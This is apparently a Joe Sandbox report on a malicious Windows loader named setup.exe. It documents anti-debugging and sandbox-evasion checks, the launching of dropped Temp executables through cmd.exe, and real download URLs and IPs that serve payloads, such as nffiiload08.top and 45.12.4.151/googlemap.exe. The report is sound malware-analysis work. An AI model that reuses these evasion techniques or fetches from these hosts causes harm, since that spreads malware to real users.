Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080D57 second address: 5080D82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD34661Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F47CD346625h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080D82 second address: 5080D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080D88 second address: 5080D8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080D8C second address: 5080D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080DF8 second address: 5080DFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5050171 second address: 50501F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361214h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F47CD361210h 0x0000000f push eax 0x00000010 jmp 00007F47CD36120Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 mov cl, 9Bh 0x00000019 pushfd 0x0000001a jmp 00007F47CD361211h 0x0000001f xor si, B276h 0x00000024 jmp 00007F47CD361211h 0x00000029 popfd 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 jmp 00007F47CD361213h 0x00000035 mov ecx, 70D2894Fh 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50501F2 second address: 505021B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346625h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47CD34661Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 505021B second address: 505022B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47CD36120Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5050279 second address: 505027D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 505027D second address: 5050283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5050283 second address: 5050298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47CD346621h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5050298 second address: 50502DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F47CD36120Ch 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov dx, si 0x00000013 pushad 0x00000014 jmp 00007F47CD361218h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 movsx edx, ax 0x00000025 mov si, 5AABh 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50502DC second address: 50502EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47CD34661Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50502EC second address: 50502F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: 2E8CAB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: 496773 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: 49F418 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\setup.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\setup.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\setup.exe TID: 5908Thread sleep time: -38019s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: setup.exe, setup.exe, 00000000.00000002.2477120409.0000000000479000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: setup.exe, 00000000.00000002.2477887067.00000000011B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhV
Source: setup.exe, 00000000.00000002.2477120409.0000000000479000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: setup.exe, 00000000.00000002.2477887067.0000000001169000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW5`v
Source: C:\Users\user\Desktop\setup.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\setup.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\setup.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\setup.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\setup.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\setup.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\setup.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\setup.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\setup.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\setup.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\setup.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\setup.exeFile opened: NTICE
Source: C:\Users\user\Desktop\setup.exeFile opened: SICE
Source: C:\Users\user\Desktop\setup.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\setup.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\setup.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\setup.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\tdxotjb.exe"Jump to behavior
Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\fydskqglg.exe"Jump to behavior
Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\mmqjncscdre.exe"Jump to behavior
Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\nmhqwem.exe"Jump to behavior
Source: setup.exe, 00000000.00000002.2477120409.0000000000479000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: YProgram Manager
Source: setup.exeBinary or memory string: YProgram Manager
Source: C:\Users\user\Desktop\setup.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
12
Process Injection
1
Masquerading
OS Credential Dumping1
Query Registry
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
24
Virtualization/Sandbox Evasion
LSASS Memory631
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
Process Injection
Security Account Manager24
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS2
Process Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
Software Packing
LSA Secrets1
System Network Configuration Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync212
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1472936 Sample: setup.exe Startdate: 14/07/2024 Architecture: WINDOWS Score: 81 28 suomenen.com 2->28 30 nffiiload08.top 2->30 32 2 other IPs or domains 2->32 40 Antivirus detection for URL or domain 2->40 42 Antivirus / Scanner detection for submitted sample 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 3 other signatures 2->46 8 setup.exe 16 2->8         started        signatures3 process4 dnsIp5 34 ip-api.com 208.95.112.1, 49719, 80 TUT-ASUS United States 8->34 36 45.12.4.151, 49720, 80 MNOGOBYTE-ASMoscowRussiaRU Russian Federation 8->36 38 2no.co 104.21.79.229, 443, 49713 CLOUDFLARENETUS United States 8->38 48 Detected unpacking (changes PE section rights) 8->48 50 Tries to detect sandboxes and other dynamic analysis tools (window names) 8->50 52 Tries to evade debugger and weak emulator (self modifying code) 8->52 54 4 other signatures 8->54 12 cmd.exe 1 2 8->12         started        14 cmd.exe 2 8->14         started        16 cmd.exe 2 8->16         started        18 cmd.exe 2 8->18         started        signatures6 process7 process8 20 conhost.exe 12->20         started        22 conhost.exe 14->22         started        24 conhost.exe 16->24         started        26 conhost.exe 18->26         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
setup.exe71%ReversingLabsWin32.Trojan.Generic
setup.exe100%AviraHEUR/AGEN.1313462
setup.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://ip-api.com/json0%URL Reputationsafe
http://45.12.4.151/googlemap.exel0%Avira URL Cloudsafe
https://2no.co/2URUU5m100%Avira URL Cloudmalware
http://nffiiload08.top/download.php?file=4.exed:0%Avira URL Cloudsafe
http://ip-api.com/jsonh0%Avira URL Cloudsafe
http://nffiiload08.top/download.php?file=6.exes;0%Avira URL Cloudsafe
http://suomenen.com/helka/trll.php0%Avira URL Cloudsafe
http://45.12.4.151/googlemap.exe0%Avira URL Cloudsafe
http://nffiiload08.top/download.php?file=4.exe0%Avira URL Cloudsafe
http://nffiiload08.top/download.php?file=4.exeG;0%Avira URL Cloudsafe
http://ip-api.com/jsoncountryCodeinvalid0%Avira URL Cloudsafe
https://2no.co/D100%Avira URL Cloudmalware
https://2no.co/100%Avira URL Cloudmalware
https://2no.co/2URUU5100%Avira URL Cloudmalware
http://ip-api.com/jsonB0%Avira URL Cloudsafe
https://2no.co/2URUU5http://nffiiload08.top/download.php?file=6.exehttp://nffiiload08.top/download.p100%Avira URL Cloudmalware
http://nffiiload08.top/download.php?file=6.exe0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
2no.co
104.21.79.229
truefalse
    unknown
    ip-api.com
    208.95.112.1
    truefalse
      unknown
      nffiiload08.top
      unknown
      unknownfalse
        unknown
        suomenen.com
        unknown
        unknownfalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          http://45.12.4.151/googlemap.exefalse
          • Avira URL Cloud: safe
          unknown
          http://ip-api.com/jsonfalse
          • URL Reputation: safe
          unknown
          https://2no.co/2URUU5false
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://2no.co/2URUU5msetup.exe, 00000000.00000002.2477887067.00000000011C5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://45.12.4.151/googlemap.exelsetup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://nffiiload08.top/download.php?file=6.exes;setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://ip-api.com/jsoncountryCodeinvalidsetup.exe, 00000000.00000002.2476665891.0000000000251000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://ip-api.com/jsonhsetup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://nffiiload08.top/download.php?file=4.exesetup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://nffiiload08.top/download.php?file=4.exeG;setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://suomenen.com/helka/trll.phpsetup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2289141220.00000000011F9000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://nffiiload08.top/download.php?file=4.exed:setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://2no.co/2URUU5http://nffiiload08.top/download.php?file=6.exehttp://nffiiload08.top/download.psetup.exe, 00000000.00000002.2476665891.0000000000251000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          https://2no.co/Dsetup.exe, 00000000.00000002.2477887067.00000000011C5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          https://2no.co/setup.exe, 00000000.00000002.2477887067.00000000011C5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://nffiiload08.top/download.php?file=6.exesetup.exe, setup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://ip-api.com/jsonBsetup.exe, 00000000.00000002.2477887067.00000000011E5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          104.21.79.229
          2no.coUnited States
          13335CLOUDFLARENETUSfalse
          208.95.112.1
          ip-api.comUnited States
          53334TUT-ASUSfalse
          45.12.4.151
          unknownRussian Federation
          42632MNOGOBYTE-ASMoscowRussiaRUfalse
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1472936
          Start date and time:2024-07-14 18:46:57 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 5m 55s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Run with higher sleep bypass
          Number of analysed new started processes analysed:15
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:setup.exe
          Detection:MAL
          Classification:mal81.evad.winEXE@13/2@4/3
          EGA Information:Failed
          HCA Information:Failed
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target setup.exe, PID 4328 because there are no executed function
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: setup.exe
          TimeTypeDescription
          12:48:15API Interceptor31x Sleep call for process: setup.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          104.21.79.229Og1SeeXcB2.exeGet hashmaliciousRemcos, Blank Grabber, PrivateLoader, SmokeLoaderBrowse
            file.exeGet hashmaliciousSmokeLoaderBrowse
              setup.htaGet hashmaliciousRHADAMANTHYSBrowse
                setup.lnkGet hashmaliciousRHADAMANTHYSBrowse
                  Blog.zipGet hashmaliciousRHADAMANTHYSBrowse
                    file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                      file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                        file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                          file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                            208.95.112.1Solara.exeGet hashmaliciousDCRatBrowse
                            • ip-api.com/line/?fields=hosting
                            ARRIVAL NOTICE.exeGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            XClient.exeGet hashmaliciousXWormBrowse
                            • ip-api.com/line/?fields=hosting
                            rQuotation.exeGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            https://eu-central.storage.cloudconvert.com/tasks/7667d2fd-6c13-460b-8f55-f179433b3df4/bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=cloudconvert-production%2F20240712%2Ffra%2Fs3%2Faws4_request&X-Amz-Date=20240712T095048Z&X-Amz-Expires=86400&X-Amz-Signature=24a9e07e4d7f7a1e041068ee72845360480440bd0d03e47d7a22ccf3f04b294d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D%22bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip%22&response-content-type=application%2Fzip&x-id=GetObjectGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • ip-api.com/line/?fields=hosting
                            QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            NEW ORDER.exeGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            SecuriteInfo.com.Win64.Evo-gen.30371.21664.exeGet hashmaliciousAkira StealerBrowse
                            • ip-api.com/json/Unknown%20IP
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            ip-api.comSolara.exeGet hashmaliciousDCRatBrowse
                            • 208.95.112.1
                            https://parthsharma13.github.io/netflixcloneusingtailwindGet hashmaliciousUnknownBrowse
                            • 51.77.64.70
                            http://yhrryu.w3spaces.com/index.htmlGet hashmaliciousUnknownBrowse
                            • 51.77.64.70
                            ARRIVAL NOTICE.exeGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            XClient.exeGet hashmaliciousXWormBrowse
                            • 208.95.112.1
                            Rechnung.zipGet hashmaliciousHTMLPhisherBrowse
                            • 208.95.112.1
                            rQuotation.exeGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            https://eu-central.storage.cloudconvert.com/tasks/7667d2fd-6c13-460b-8f55-f179433b3df4/bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=cloudconvert-production%2F20240712%2Ffra%2Fs3%2Faws4_request&X-Amz-Date=20240712T095048Z&X-Amz-Expires=86400&X-Amz-Signature=24a9e07e4d7f7a1e041068ee72845360480440bd0d03e47d7a22ccf3f04b294d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D%22bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip%22&response-content-type=application%2Fzip&x-id=GetObjectGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • 208.95.112.1
                            QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            2no.cofile.exeGet hashmaliciousXenoRATBrowse
                            • 172.67.149.76
                            Og1SeeXcB2.exeGet hashmaliciousRemcos, Blank Grabber, PrivateLoader, SmokeLoaderBrowse
                            • 104.21.79.229
                            file.exeGet hashmaliciousSmokeLoaderBrowse
                            • 104.21.79.229
                            rpeticao_inicial.vbsGet hashmaliciousUnknownBrowse
                            • 172.67.149.76
                            setup.htaGet hashmaliciousRHADAMANTHYSBrowse
                            • 104.21.79.229
                            setup.lnkGet hashmaliciousRHADAMANTHYSBrowse
                            • 104.21.79.229
                            Blog.zipGet hashmaliciousRHADAMANTHYSBrowse
                            • 104.21.79.229
                            qG2cUr0x4A.exeGet hashmaliciousBitCoin Miner, RedLine, SmokeLoaderBrowse
                            • 172.67.149.76
                            file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                            • 104.21.79.229
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CLOUDFLARENETUS#U8acb#U6c42#U66f8.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                            • 188.114.96.3
                            https://jc541gdi.r.ap-south-1.awstrack.me/L0/https:%2F%2Fapi.growthschool.io%2Fredirect%3Fredirect=https%253A%252F%252Foutskill-api.growthschool.io%252Fv1%252Fredirect%253Fredirect%253Dhttps%25253A%25252F%25252Fwebinar.growthschool.io%25252Flive%25252F269690%25253Fsignup%25253Dd4694f1d-e1f6-4ebc-81f9-ccf7f397c75f%2526propsGeneratorKey%253DwebinarCommsLinkClicked%2526job%253DtrackEvent%2526eventName%253DWebinar%252520Comms%252520Link%252520Clicked%2526trackingProps%25255Btemplate_id%25255D%253DoneHourBefore%2526trackingProps%25255Bcomms_channel%25255D%253Demail%2526trackingProps%25255Bcta_text%25255D%253DJoin%252520Stream%2526trackingProps%25255Bcta_type%25255D%253Dlive_session%2526trackingProps%25255Blink_clicked%25255D%253Dhttps%25253A%25252F%25252Fwebinar.growthschool.io%25252Flive%25252F269690%25253Fsignup%25253Dd4694f1d-e1f6-4ebc-81f9-ccf7f397c75f%2526webinarSignupId%253D2330725/1/01090190b18b243d-902569cd-4b19-4fb0-9d62-751dd82840dc-000000/eiZ4tO0LwZqkUm_KmdP3dz-yVLc=163Get hashmaliciousUnknownBrowse
                            • 104.22.65.157
                            s6ue6dcFAI.exeGet hashmaliciousBabadedaBrowse
                            • 172.64.41.3
                            JblYqEneyY.exeGet hashmaliciousBabadedaBrowse
                            • 172.64.41.3
                            DHL Waybill & Shipping Document.exeGet hashmaliciousSnake KeyloggerBrowse
                            • 188.114.96.3
                            s6ue6dcFAI.exeGet hashmaliciousBabadedaBrowse
                            • 172.64.41.3
                            Shipping Docs PO#QSB-8927393_2324, QSB-8927394_23-24.xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 188.114.96.3
                            utb4rWi35E.exeGet hashmaliciousLummaCBrowse
                            • 172.67.143.57
                            Orden de Compra.exeGet hashmaliciousGuLoaderBrowse
                            • 104.26.12.205
                            MNOGOBYTE-ASMoscowRussiaRUtdQ8dOfnDZ.elfGet hashmaliciousMirai, MoobotBrowse
                            • 77.220.188.98
                            BwuomGG1ev.elfGet hashmaliciousMiraiBrowse
                            • 83.222.115.140
                            lMIVD0KqYQ.elfGet hashmaliciousMiraiBrowse
                            • 83.222.115.132
                            bR9Ri9cFkm.elfGet hashmaliciousUnknownBrowse
                            • 83.222.115.104
                            https://goo.su/l1bfUYRGet hashmaliciousUnknownBrowse
                            • 83.222.115.14
                            dI3tFWyJ6d.elfGet hashmaliciousMiraiBrowse
                            • 77.220.188.52
                            7n89nEPSkV.elfGet hashmaliciousMirai, GafgytBrowse
                            • 77.220.164.70
                            huhu.arm5.elfGet hashmaliciousMirai, OkiruBrowse
                            • 77.220.188.78
                            RpjE7NostK.elfGet hashmaliciousMiraiBrowse
                            • 77.220.164.90
                            TUT-ASUSSolara.exeGet hashmaliciousDCRatBrowse
                            • 208.95.112.1
                            ARRIVAL NOTICE.exeGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            XClient.exeGet hashmaliciousXWormBrowse
                            • 208.95.112.1
                            Rechnung.zipGet hashmaliciousHTMLPhisherBrowse
                            • 208.95.112.1
                            rQuotation.exeGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            https://eu-central.storage.cloudconvert.com/tasks/7667d2fd-6c13-460b-8f55-f179433b3df4/bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=cloudconvert-production%2F20240712%2Ffra%2Fs3%2Faws4_request&X-Amz-Date=20240712T095048Z&X-Amz-Expires=86400&X-Amz-Signature=24a9e07e4d7f7a1e041068ee72845360480440bd0d03e47d7a22ccf3f04b294d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D%22bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip%22&response-content-type=application%2Fzip&x-id=GetObjectGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • 208.95.112.1
                            QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            NEW ORDER.exeGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            37f463bf4616ecd445d4a1937da06e19SecuriteInfo.com.W32.Kryptik.CI.tr.21358.1519.exeGet hashmaliciousUnknownBrowse
                            • 104.21.79.229
